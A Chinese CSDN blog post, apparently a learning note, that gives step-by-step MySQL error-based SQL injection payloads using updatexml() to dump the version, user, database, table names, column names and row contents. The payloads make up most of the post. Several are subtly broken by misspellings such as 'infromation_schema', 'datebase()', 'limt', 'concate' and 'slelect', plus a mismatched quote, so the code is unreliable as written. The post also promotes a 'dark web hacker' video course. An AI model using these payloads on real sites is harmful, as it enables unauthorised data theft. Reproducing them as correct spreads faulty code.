【SQL注入】报错注入--实战示例

已于 2024-03-30 18:19:44 修改
阅读量486 收藏 4
点赞数 10
文章标签: sql 数据库 网络安全
于 2024-03-20 15:35:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_57347472/article/details/136876193
版权

1.爆数据库版本信息

k' and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)#

k这个字母是随便写的,写啥都行,ox7e是16进制,表示~,也可以直接写“~”

2.爆数据库当前用户信息

k' and updatexml(1,concat(0x7e,(SELECT user()),0x7e),1)#

3.爆数据库

k' and updatexml(1, concat(0x7e,(SELECT datebase()),0x7e),1)#

4.爆表

mysql5.1版本及以上版本,会存在一个叫infromation_schema的默认数据库,这个数据库里面记录着整个mysql管理的数据库的名称、表名、列名(字段名)

获取数据库表名 输入 

k' and updatexml(1,concat(0x7e,(select table_name from infromation_schema.tables where table_schema='数据库名字’)),0)#

若反馈错误表示只能显示一行,所以可以采用limit来一行一行显示,查看报错 

k' and updatexml(1,concat(0x7e,(select table_name from infromation_schema.tables where table_schema='数据库名字’  limt 0,1)),0)#

infromation_schema中的tables表存了各个数据库中有的表的表名

5.爆字段

infromation_schema中的columns存的是所有的库的所有表的列的字段名信息

 k' and updatexml(1, concat(0x7e,(select column_name from information_schema.columns where table_name='表名' and table_schema='库名' limit 0,1),0x7e),0)#

6.爆字段内容

k' and updatexml(1,concate(0x7e,(slelect 字段名 from 表名 limit 0,1),0x7e),0)#

concat 只能一列一 输出

感谢师傅的优秀视频

【【网络安全】暗网黑客技术教程,只要你敢学我就敢教!零基础学习网络安全/黑客技术/SQL注入/漏洞挖掘/木马免杀/零基础/计算机基础】 https://www.bilibili.com/video/BV14u4m1M7iq/?share_source=copy_web&vd_source=361eef8cb78f11c9df72e7e3979e25a6

快搞钱
关注
  • 10
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
SQL注入报错注入
帅醉了的博客
03-03 1201
0x00_报错注入原理 构造报错payload让信息通过报错信息回显出来。在查询不回现内容,会答应错误信息。Update、insert等语句,会打印错误信息。 0x01_报错注入操作 floor()报错注入 mysql模板: concat:连接字符串功能 floor:去整数值 rand:取0~1之间的随机浮点值 group by:根据一个或多个列对结果集进行分组并有排序功能 select coun...
第四节 基于报错的SQL注入-01
09-15
基于报错的SQL注入 SQL注入是一种常见的Web应用程序漏洞,攻击者可以通过在输入参数中inject恶意SQL代码来获取敏感数据或控制服务器。今天,我们将讨论基于报错的SQL注入,包括其分类、发现和利用方法。 SQL注入...
SQL注入-报错注入
m0_72125469的博客
11-24 730
SQL注入系列-报错注入
基于错误的的sql注入模版(post)
weixin_30517001的博客
05-09 240
一、报错分析riaDBserverversionfortherightsyntaxtousenear'))"andpassword=""LIMIT0,1'atline1 syntaxtousenear'"""andpassword=""LIMIT0,1'atline1基于双引号二、分析类型。万能登录成功三、没有回显位。估计应该是基于错误的注释。1、正确答案(勿改动)数据库名uname=123...
SQLi LABS Less 14 报错注入+布尔盲注_less14盲注脚本(1)
2401_84264692的博客
05-17 792
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
最详细的SQL注入报错注入
热门推荐
qq_62539372的博客
06-23 1万+
最详细的sql注入报错注入,非常适合小白!!
sql注入报错注入(精简详细)
qq_56438857的博客
08-02 2077
一直对sql注入报错注入没有系统的整理过,今天整理一遍,方便以后查阅。下面的语句可以直接在sql-lab中实践。
web-报错注入-皮卡丘靶场
07-15
报错注入】是一种安全漏洞,它发生在Web应用程序中,当用户输入的数据被错误地用于构造数据库查询时,导致数据库返回错误信息。这些错误信息可能包含敏感数据,从而让攻击者能够获取未授权的信息或者控制数据库。...
超级SQL注入工具-web-sql
10-28
超级SQL注入工具是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入 支持Bool型盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle...
SQL注入 报错(updatexml与extractvalue函数介绍)-01
09-15
SQL注入报错(updatexml与extractvalue函数介绍) SQL注入是一种常见的Web应用安全漏洞,它是指攻击者通过在Web应用的输入中inject恶意的SQL代码,来获取或修改数据库中的数据。今天,我们将讨论SQL注入报错的两种...
[SQL注入] 报错注入
weixin_43586169的博客
05-07 1633
详细描述了SQL注入的四大基本手法中的报错注入的使用
sql 报错注入
travelnight的博客
03-15 4069
以往个人知识星球搬运 by travelnight 这里以sql-libs为例。 一、基础报错注入 这里的东西比较简单,快速略过。 访问:http://127.0.0.1/sqllabs/Less-1/ 直接构造id参数 http://127.0.0.1/sqllabs/Less-1/?id=1 直接加 ‘触发报错 直接闭合‘ 标签发现正常,说明存在报错注入。 http://127.0.0.1/sqllabs/Less-1/...
SQL性能优化策略
modelsetget的博客
07-08 486
你不得不知的SQL调优策略笔记
F4搜索帮助和按条件写sql
m0_60109224的博客
07-08 267
2.按条件读取刚刚写的sql数据,if sy-subrc 中可以继续读。3.搜索帮助用函数和sql实现。4.根据屏幕输入数据筛选实现。
如何解决 PostgreSQL 中由于索引不当导致的性能下降问题?
最新发布
技术笔记
07-12 392
比如说,有一个订单表,其中“订单日期”这个列经常被用于按时间范围查询订单,但却没有为其创建索引,这就会导致数据库在查询时需要遍历整个表,极大地降低了查询速度。命令,我们可以查看查询的执行计划。再举一个例子,如果我们发现某个表上存在多个类似的索引,比如“idx_age_1”和“idx_age_2”,并且它们的定义几乎相同,这时候就可以考虑删除其中一个冗余的索引,以减少维护成本和提高性能。然而,就像任何复杂的系统一样,它也可能会遇到性能方面的挑战,其中由于索引不当导致的性能下降问题是比较常见且令人头疼的。
[高频 SQL 50 题(基础版)]第一千七百五十七题,可回收且低脂产品
weixin_45201305的博客
07-10 254
low_fats 是枚举类型,取值为以下两种 ('Y', 'N'),其中 'Y' 表示该产品是低脂产品,'N' 表示不是低脂产品。recyclable 是枚举类型,取值为以下两种 ('Y', 'N'),其中 'Y' 表示该产品可回收,而 'N' 表示不可回收。没什么难度,作为基础题五十题的第一题练手,现在也开始陆续写一些SQL,作为记录,和leetcode一起,大家都加油。编写解决方案找出既是低脂又是可回收的产品编号。是该表的主键(具有唯一值的列)。
SQL面试题-留存率计算
xiao4816的博客
07-07 324
计算的是整段时间范围内,每一天为基准的所有的留存1、2、7天的用户数。计算的是用户首次登陆时间为基准时间,计算该基准时间之后的n日留存率。方法一的优势是可以一次性计算出,每天的不同时间范围的留存率。缺点:如果要计算n天留存需要增加代码量。但是不是很直观,并且计算量比较大。优点:代码直观好理解。
SQL Server设置端口:跨平台指南
招风的黑耳CSDN
07-09 583
在使用SQL Server时,设置或修改其监听的端口是确保数据库服务安全访问和高效管理的重要步骤。由于SQL Server可以部署在多种操作系统上,包括Windows、Linux和Docker容器等,因此设置端口的步骤和方法也会因平台而异。本文将为您提供一个跨平台的指南,帮助您在不同环境下设置SQL Server的端口。
sqli-labs实验指导手册
11-17
sqli-labs实验指导手册,通过搭建sqli-labs实验平台,对每一道题进行通关操作的讲解,帮助同学们学习和操作以及理解Sql注入的原理

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值